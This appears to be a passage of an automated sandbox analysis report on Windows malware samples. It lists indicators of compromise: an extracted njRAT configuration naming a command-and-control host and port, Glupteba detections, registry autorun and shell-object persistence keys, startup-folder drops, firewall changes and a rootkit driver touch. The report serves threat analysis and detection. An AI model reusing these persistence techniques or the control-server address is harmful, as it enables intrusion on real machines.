Analysis
-
max time kernel
1200s -
max time network
1201s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
19-05-2024 11:19
Static task
static1
URLScan task
urlscan1
General
Malware Config
Extracted
njrat
0.7d
jjj
youri.mooo.com:1605
e936a10f968ac948cd351c9629dbd36d
-
reg_key
e936a10f968ac948cd351c9629dbd36d
-
splitter
|'|'|
Signatures
-
Adds autorun key to be loaded by Explorer.exe on startup 2 TTPs 64 IoCs
Processes:
Aaminc32.exeIdloki32.exeMnohhh32.exePmeggp32.exeMbpdnm32.exeNeiilpob.exeOmigkb32.exeLjffqbmj.exeJgpdbcne.exeNladckha.exePhfaijae.exeDmhidg32.exeGffheg32.exeAnjiim32.exeFfcjcpid.exeOaejfgdl.exeEpphfa32.exeGpejhn32.exeOognjkdi.exeCoflie32.exeFmdafcfm.exeFinkeo32.exeEmenko32.exeNielge32.exeLmkbcf32.exeAhmqqf32.exeClgibc32.exeDiamin32.exeNblcjkcj.exeIgfale32.exeOabffa32.exeIqfcppkd.exeEpgngppn.exeGpiccnoi.exeHgahaeke.exeHdmloaee.exeOdhick32.exeCddjledl.exeFppqmogc.exeKcphnclo.exeLgniko32.exeLiqieh32.exeMheffdaf.exeNhcbgb32.exeDfpmmmem.exeKknmjfje.exeOeafge32.exeGmfnlb32.exeEoanaj32.exeBmgpmi32.exeJiijmkai.exeAadonbij.exeQokiaboe.exeQhdnjh32.exeCbfekpid.exeLnalgjah.exeMenipb32.exeNakpebhk.exeCbdhepkg.exeDkehjnfa.exeEkjklk32.exeGpjjndcd.exedescription ioc Process Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad Aaminc32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger = "{79FAA099-1BAE-816E-D711-115290CEE717}" Idloki32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger = "{79FAA099-1BAE-816E-D711-115290CEE717}" Mnohhh32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger = "{79FAA099-1BAE-816E-D711-115290CEE717}" Pmeggp32.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad Mbpdnm32.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad Neiilpob.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger = "{79FAA099-1BAE-816E-D711-115290CEE717}" Omigkb32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger = "{79FAA099-1BAE-816E-D711-115290CEE717}" Ljffqbmj.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger = "{79FAA099-1BAE-816E-D711-115290CEE717}" Jgpdbcne.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad Nladckha.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger = "{79FAA099-1BAE-816E-D711-115290CEE717}" Phfaijae.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger = "{79FAA099-1BAE-816E-D711-115290CEE717}" Dmhidg32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger = "{79FAA099-1BAE-816E-D711-115290CEE717}" Gffheg32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger = "{79FAA099-1BAE-816E-D711-115290CEE717}" Anjiim32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger = "{79FAA099-1BAE-816E-D711-115290CEE717}" Ffcjcpid.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad Oaejfgdl.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad Epphfa32.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad Gpejhn32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger = "{79FAA099-1BAE-816E-D711-115290CEE717}" Oognjkdi.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad Coflie32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger = "{79FAA099-1BAE-816E-D711-115290CEE717}" Fmdafcfm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger = "{79FAA099-1BAE-816E-D711-115290CEE717}" Finkeo32.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad Emenko32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger = "{79FAA099-1BAE-816E-D711-115290CEE717}" Nielge32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger = "{79FAA099-1BAE-816E-D711-115290CEE717}" Lmkbcf32.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad Ahmqqf32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger = "{79FAA099-1BAE-816E-D711-115290CEE717}" Clgibc32.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad Diamin32.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad Nblcjkcj.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger = "{79FAA099-1BAE-816E-D711-115290CEE717}" Igfale32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger = "{79FAA099-1BAE-816E-D711-115290CEE717}" Oabffa32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger = "{79FAA099-1BAE-816E-D711-115290CEE717}" Iqfcppkd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger = "{79FAA099-1BAE-816E-D711-115290CEE717}" Epgngppn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger = "{79FAA099-1BAE-816E-D711-115290CEE717}" Gpiccnoi.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad Hgahaeke.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad Hdmloaee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger = "{79FAA099-1BAE-816E-D711-115290CEE717}" Odhick32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger = "{79FAA099-1BAE-816E-D711-115290CEE717}" Cddjledl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger = "{79FAA099-1BAE-816E-D711-115290CEE717}" Fppqmogc.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad Gffheg32.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad Kcphnclo.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad Lgniko32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger = "{79FAA099-1BAE-816E-D711-115290CEE717}" Liqieh32.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad Mheffdaf.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger = "{79FAA099-1BAE-816E-D711-115290CEE717}" Nhcbgb32.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad Dfpmmmem.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad Kknmjfje.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad Oeafge32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger = "{79FAA099-1BAE-816E-D711-115290CEE717}" Gmfnlb32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger = "{79FAA099-1BAE-816E-D711-115290CEE717}" Eoanaj32.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad Bmgpmi32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger = "{79FAA099-1BAE-816E-D711-115290CEE717}" Jiijmkai.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger = "{79FAA099-1BAE-816E-D711-115290CEE717}" Aadonbij.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad Fppqmogc.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad Qokiaboe.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger = "{79FAA099-1BAE-816E-D711-115290CEE717}" Qhdnjh32.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad Cbfekpid.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad Lnalgjah.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger = "{79FAA099-1BAE-816E-D711-115290CEE717}" Menipb32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger = "{79FAA099-1BAE-816E-D711-115290CEE717}" Nakpebhk.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger = "{79FAA099-1BAE-816E-D711-115290CEE717}" Cbdhepkg.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad Dkehjnfa.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad Ekjklk32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger = "{79FAA099-1BAE-816E-D711-115290CEE717}" Gpjjndcd.exe -
Glupteba payload 7 IoCs
Processes:
resource yara_rule behavioral1/memory/2208-327-0x0000000000400000-0x0000000002B0B000-memory.dmp family_glupteba behavioral1/memory/4988-357-0x0000000000400000-0x0000000002B0B000-memory.dmp family_glupteba behavioral1/memory/4988-407-0x0000000000400000-0x0000000002B0B000-memory.dmp family_glupteba behavioral1/memory/1596-433-0x0000000000400000-0x0000000002B0B000-memory.dmp family_glupteba behavioral1/memory/1596-486-0x0000000000400000-0x0000000002B0B000-memory.dmp family_glupteba behavioral1/memory/1596-989-0x0000000000400000-0x0000000002B0B000-memory.dmp family_glupteba behavioral1/memory/1596-2677-0x0000000000400000-0x0000000002B0B000-memory.dmp family_glupteba -
Modifies AppInit DLL entries 2 TTPs
-
Modifies Windows Firewall 2 TTPs 2 IoCs
Processes:
netsh.exenetsh.exepid Process 3084 netsh.exe 2504 netsh.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exelocxopti.exedescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation locxopti.exe -
Drops startup file 4 IoCs
Processes:
virussign.com_0fcd98c430355cad3e548a63ba704cd4.exevirussign.com_1e903a364fd4c0d461993bc1db029e4b.exedescription ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\locxopti.exe virussign.com_0fcd98c430355cad3e548a63ba704cd4.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\locxopti.exe virussign.com_1e903a364fd4c0d461993bc1db029e4b.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\locxopti.exe.tmp virussign.com_1e903a364fd4c0d461993bc1db029e4b.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\locxopti.exe.dat virussign.com_1e903a364fd4c0d461993bc1db029e4b.exe -
Executes dropped EXE 64 IoCs
Processes:
virussign.com_0a20b558065db2051bcbfa0cd7fe943f.exewinmgr107.exewinmgr107.exevirussign.com_0a9cfc2c2484a4c4faa964d90b7061f9.exevirussign.com_0a9cfc2c2484a4c4faa964d90b7061f9.execsrss.exeinjector.exevirussign.com_0d1d052a017c095816dffa6e1789be93.exeBobihl32.exeBjgnfd32.exeBfnnkeio.exeCmjcmooi.exeCcdkji32.exeCjqqlc32.exeCpnidj32.exeCfgaadad.exeDmkldm32.exeDhpqafpl.exeDiamin32.exeEjfcnp32.exeEapkkjqd.exeEdnggfph.exeEabhpj32.exeEimldl32.exeEhnmbddl.exeEjmioo32.exeEpjagf32.exeFfcjcpid.exeFibfplhg.exeFainaihj.exeFkabjo32.exeFpnkbema.exeFpqggeko.exeFpcdme32.exeFhjlnb32.exeFkhhjn32.exeFabqghpo.exeGhmidb32.exeGinekjnj.exeGaemmgnl.exeGhoeiaei.exeGipbaj32.exeGpjjndcd.exeGnnkghbn.exeGplgccaa.exeGhcoda32.exeGalcmfhd.exeGhfljq32.exeGkdhfl32.exeGnbdbg32.exeHdmloaee.exeHaqmhf32.exeHjlamh32.exeHpfjibig.exeHkkngk32.exeHdcbpqom.exeHknklk32.exeHahcieng.exeHdfoepmk.exeHkpgbjdh.exeIajpod32.exewindefender.exeIhdhkoca.exeInqqceai.exepid Process 1652 virussign.com_0a20b558065db2051bcbfa0cd7fe943f.exe 4508 winmgr107.exe 5056 winmgr107.exe 2208 virussign.com_0a9cfc2c2484a4c4faa964d90b7061f9.exe 4988 virussign.com_0a9cfc2c2484a4c4faa964d90b7061f9.exe 1596 csrss.exe 816 injector.exe 4568 virussign.com_0d1d052a017c095816dffa6e1789be93.exe 580 Bobihl32.exe 4608 Bjgnfd32.exe 1524 Bfnnkeio.exe 4104 Cmjcmooi.exe 2912 Ccdkji32.exe 4472 Cjqqlc32.exe 2276 Cpnidj32.exe 1040 Cfgaadad.exe 3540 Dmkldm32.exe 2184 Dhpqafpl.exe 5092 Diamin32.exe 2644 Ejfcnp32.exe 1608 Eapkkjqd.exe 2300 Ednggfph.exe 3416 Eabhpj32.exe 2844 Eimldl32.exe 892 Ehnmbddl.exe 412 Ejmioo32.exe 1520 Epjagf32.exe 4476 Ffcjcpid.exe 4672 Fibfplhg.exe 2040 Fainaihj.exe 1720 Fkabjo32.exe 5016 Fpnkbema.exe 4428 Fpqggeko.exe 736 Fpcdme32.exe 4440 Fhjlnb32.exe 4164 Fkhhjn32.exe 1416 Fabqghpo.exe 4304 Ghmidb32.exe 4780 Ginekjnj.exe 4644 Gaemmgnl.exe 2556 Ghoeiaei.exe 380 Gipbaj32.exe 1780 Gpjjndcd.exe 532 Gnnkghbn.exe 1464 Gplgccaa.exe 2056 Ghcoda32.exe 1800 Galcmfhd.exe 748 Ghfljq32.exe 1308 Gkdhfl32.exe 1612 Gnbdbg32.exe 3948 Hdmloaee.exe 2244 Haqmhf32.exe 116 Hjlamh32.exe 3696 Hpfjibig.exe 3316 Hkkngk32.exe 2860 Hdcbpqom.exe 3476 Hknklk32.exe 2820 Hahcieng.exe 1888 Hdfoepmk.exe 3216 Hkpgbjdh.exe 1528 Iajpod32.exe 3008 windefender.exe 3392 Ihdhkoca.exe 4444 Inqqceai.exe -
Loads dropped DLL 64 IoCs
Processes:
virussign.com_1e903a364fd4c0d461993bc1db029e4b.exepowershell.exe1bf850b4d9587c1017a75a47680584c4.exewinmgr107.exevirussign.com_2a07d4eba2de1b08de71e85e6f95c09c.exewinmgr107.exevirussign.com_2c7c4a9cfe4af65d1f94178378eba736.exewinmgr107.exevirussign.com_2d54dcee31f046ad027f640b4c6773db.exewinmgr107.exewinmgr107.exepowershell.exepowershell.exewinmgr107.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exewinmgr107.exevirussign.com_99444be259ad13b8eb91cd8e1a4e925b.exevirussign.com_4701747d5b12daafc6bf30d49dfd6b5b.exepid Process 11256 virussign.com_1e903a364fd4c0d461993bc1db029e4b.exe 5692 powershell.exe 11256 virussign.com_1e903a364fd4c0d461993bc1db029e4b.exe 11256 virussign.com_1e903a364fd4c0d461993bc1db029e4b.exe 11256 virussign.com_1e903a364fd4c0d461993bc1db029e4b.exe 11256 virussign.com_1e903a364fd4c0d461993bc1db029e4b.exe 11256 virussign.com_1e903a364fd4c0d461993bc1db029e4b.exe 11256 virussign.com_1e903a364fd4c0d461993bc1db029e4b.exe 11256 virussign.com_1e903a364fd4c0d461993bc1db029e4b.exe 11256 virussign.com_1e903a364fd4c0d461993bc1db029e4b.exe 5596 1bf850b4d9587c1017a75a47680584c4.exe 5596 1bf850b4d9587c1017a75a47680584c4.exe 5596 1bf850b4d9587c1017a75a47680584c4.exe 5596 1bf850b4d9587c1017a75a47680584c4.exe 5596 1bf850b4d9587c1017a75a47680584c4.exe 5596 1bf850b4d9587c1017a75a47680584c4.exe 10812 winmgr107.exe 10812 winmgr107.exe 10812 winmgr107.exe 10812 winmgr107.exe 10812 winmgr107.exe 10812 winmgr107.exe 10812 winmgr107.exe 10980 virussign.com_2a07d4eba2de1b08de71e85e6f95c09c.exe 10980 virussign.com_2a07d4eba2de1b08de71e85e6f95c09c.exe 10980 virussign.com_2a07d4eba2de1b08de71e85e6f95c09c.exe 732 winmgr107.exe 10980 virussign.com_2a07d4eba2de1b08de71e85e6f95c09c.exe 10980 virussign.com_2a07d4eba2de1b08de71e85e6f95c09c.exe 11652 virussign.com_2c7c4a9cfe4af65d1f94178378eba736.exe 9460 winmgr107.exe 9244 virussign.com_2d54dcee31f046ad027f640b4c6773db.exe 9148 winmgr107.exe 8868 winmgr107.exe 10980 virussign.com_2a07d4eba2de1b08de71e85e6f95c09c.exe 10980 virussign.com_2a07d4eba2de1b08de71e85e6f95c09c.exe 11128 powershell.exe 7720 powershell.exe 7128 winmgr107.exe 7128 winmgr107.exe 7128 winmgr107.exe 7128 winmgr107.exe 7128 winmgr107.exe 7128 winmgr107.exe 7128 winmgr107.exe 7096 WerFault.exe 8284 WerFault.exe 8672 WerFault.exe 6528 WerFault.exe 10980 virussign.com_2a07d4eba2de1b08de71e85e6f95c09c.exe 10980 virussign.com_2a07d4eba2de1b08de71e85e6f95c09c.exe 5232 winmgr107.exe 5052 virussign.com_99444be259ad13b8eb91cd8e1a4e925b.exe 5232 winmgr107.exe 5232 winmgr107.exe 5232 winmgr107.exe 5232 winmgr107.exe 5232 winmgr107.exe 5232 winmgr107.exe 2676 virussign.com_4701747d5b12daafc6bf30d49dfd6b5b.exe 2676 virussign.com_4701747d5b12daafc6bf30d49dfd6b5b.exe 2676 virussign.com_4701747d5b12daafc6bf30d49dfd6b5b.exe 2676 virussign.com_4701747d5b12daafc6bf30d49dfd6b5b.exe 2676 virussign.com_4701747d5b12daafc6bf30d49dfd6b5b.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule behavioral1/memory/3008-839-0x0000000000400000-0x00000000008DF000-memory.dmp upx behavioral1/files/0x000a0000000238cb-4611.dat upx behavioral1/files/0x00120000000238d6-4939.dat upx -
Adds Run key to start application 2 TTPs 6 IoCs
Processes:
virussign.com_0fcd98c430355cad3e548a63ba704cd4.exevirussign.com_0a20b558065db2051bcbfa0cd7fe943f.exewinmgr107.exevirussign.com_0a9cfc2c2484a4c4faa964d90b7061f9.execsrss.exedescription ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Parametr = "C:\\KaVBTL\\optixsys.exe" virussign.com_0fcd98c430355cad3e548a63ba704cd4.exe Set value (str) \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\2 = "C:\\ProgramData\\winmgr107.exe" virussign.com_0a20b558065db2051bcbfa0cd7fe943f.exe Set value (str) \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\2 = "C:\\ProgramData\\winmgr107.exe" winmgr107.exe Set value (str) \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" virussign.com_0a9cfc2c2484a4c4faa964d90b7061f9.exe Set value (str) \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" csrss.exe Set value (str) \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Parametr = "C:\\SysDrvM6\\abodloc.exe" virussign.com_0fcd98c430355cad3e548a63ba704cd4.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Enumerates connected drives 3 TTPs 3 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
virussign.com_1e903a364fd4c0d461993bc1db029e4b.exewinmgr107.exevirussign.com_2a07d4eba2de1b08de71e85e6f95c09c.exedescription ioc Process File opened (read-only) \??\e: virussign.com_1e903a364fd4c0d461993bc1db029e4b.exe File opened (read-only) \??\e: winmgr107.exe File opened (read-only) \??\e: virussign.com_2a07d4eba2de1b08de71e85e6f95c09c.exe -
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
Processes:
csrss.exedescription ioc Process File opened for modification \??\WinMonFS csrss.exe -
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource yara_rule behavioral1/files/0x0008000000023445-235.dat autoit_exe behavioral1/files/0x00080000000234a5-265.dat autoit_exe -
Drops file in System32 directory 64 IoCs
Processes:
Aadonbij.exeCcfaec32.exeDbphaoaj.exeEjjeoiaf.exeNllkhk32.exeAlojkfno.exeHpfjibig.exeJkbmng32.exeQeeanl32.exeDbanlhkk.exeEndnmggb.exeDiamin32.exeLgopee32.exeAocfmgli.exeCmjlbikm.exeNaicpbjn.exeCojnjndb.exevirussign.com_0d1d052a017c095816dffa6e1789be93.exeGpjjndcd.exeElfhkbkj.exeIcmbafld.exeJcknbd32.exeOdabblag.exeOdhick32.exeEmenko32.exeEijidfjd.exeGmmdmanb.exeNhhehlne.exeOaejfgdl.exeNjfadgmi.exeJdkagm32.exeMjfogp32.exeJdfaag32.exeKcphnclo.exeQknqkdho.exeBnlfomip.exeEimldl32.exeDjgpblal.exeEbpqhl32.exeJjnqoo32.exeLnalgjah.exeBfnnkeio.exeCmjcmooi.exeMiliqf32.exeFifhpe32.exeIjldiopl.exeLklbanji.exeEfkfndgd.exeIqfcppkd.exeQiohdadi.exeAcclheql.exeBcfhneoj.exeEbejcloa.exeFbjcnk32.exeEmnhjpei.exeFfpoid32.exeCjqqlc32.exeHkkngk32.exeElaopc32.exeMkcham32.exePmeggp32.exeMlflabfj.exeOodadlgk.exedescription ioc Process File created C:\Windows\SysWOW64\Ajkgppjl.exe Aadonbij.exe File created C:\Windows\SysWOW64\Ckafienb.exe Ccfaec32.exe File opened for modification C:\Windows\SysWOW64\Djgpblal.exe Dbphaoaj.exe File created C:\Windows\SysWOW64\Emhakeqj.exe Ejjeoiaf.exe File opened for modification C:\Windows\SysWOW64\Naicpbjn.exe Nllkhk32.exe File opened for modification C:\Windows\SysWOW64\Aonfgbmb.exe Alojkfno.exe File created C:\Windows\SysWOW64\Hkkngk32.exe Hpfjibig.exe File created C:\Windows\SysWOW64\Cmnkcepa.dll Jkbmng32.exe File created C:\Windows\SysWOW64\Qhdnjh32.exe Qeeanl32.exe File opened for modification C:\Windows\SysWOW64\Ddpjhcjo.exe Dbanlhkk.exe File created C:\Windows\SysWOW64\Epdaoo32.dll Endnmggb.exe File created C:\Windows\SysWOW64\Elbcgn32.dll Diamin32.exe File created C:\Windows\SysWOW64\Ljmmaa32.exe Lgopee32.exe File created C:\Windows\SysWOW64\Aaabickl.exe Aocfmgli.exe File created C:\Windows\SysWOW64\Mdfmpd32.dll Cmjlbikm.exe File created C:\Windows\SysWOW64\Hcacig32.dll Naicpbjn.exe File opened for modification C:\Windows\SysWOW64\Cfdgfh32.exe Cojnjndb.exe File opened for modification C:\Windows\SysWOW64\Bobihl32.exe virussign.com_0d1d052a017c095816dffa6e1789be93.exe File created C:\Windows\SysWOW64\Gnnkghbn.exe Gpjjndcd.exe File created C:\Windows\SysWOW64\Ebpqhl32.exe Elfhkbkj.exe File created C:\Windows\SysWOW64\Ijgjnp32.exe Icmbafld.exe File opened for modification C:\Windows\SysWOW64\Jjefonga.exe Jcknbd32.exe File opened for modification C:\Windows\SysWOW64\Ojkkof32.exe Odabblag.exe File created C:\Windows\SysWOW64\Aamhhb32.dll Odhick32.exe File opened for modification C:\Windows\SysWOW64\Epcjgj32.exe Emenko32.exe File opened for modification C:\Windows\SysWOW64\Elieqbig.exe Eijidfjd.exe File opened for modification C:\Windows\SysWOW64\Gplpimmf.exe Gmmdmanb.exe File created C:\Windows\SysWOW64\Njfadgmi.exe Nhhehlne.exe File opened for modification C:\Windows\SysWOW64\Oeafge32.exe Oaejfgdl.exe File created C:\Windows\SysWOW64\Omhfglnj.dll Njfadgmi.exe File created C:\Windows\SysWOW64\Ioaaoadd.dll Jdkagm32.exe File created C:\Windows\SysWOW64\Pqpcaacj.dll Mjfogp32.exe File created C:\Windows\SysWOW64\Jkpjnabi.exe Jdfaag32.exe File opened for modification C:\Windows\SysWOW64\Kkgpoqma.exe Kcphnclo.exe File created C:\Windows\SysWOW64\Qagihnpk.exe Qknqkdho.exe File created 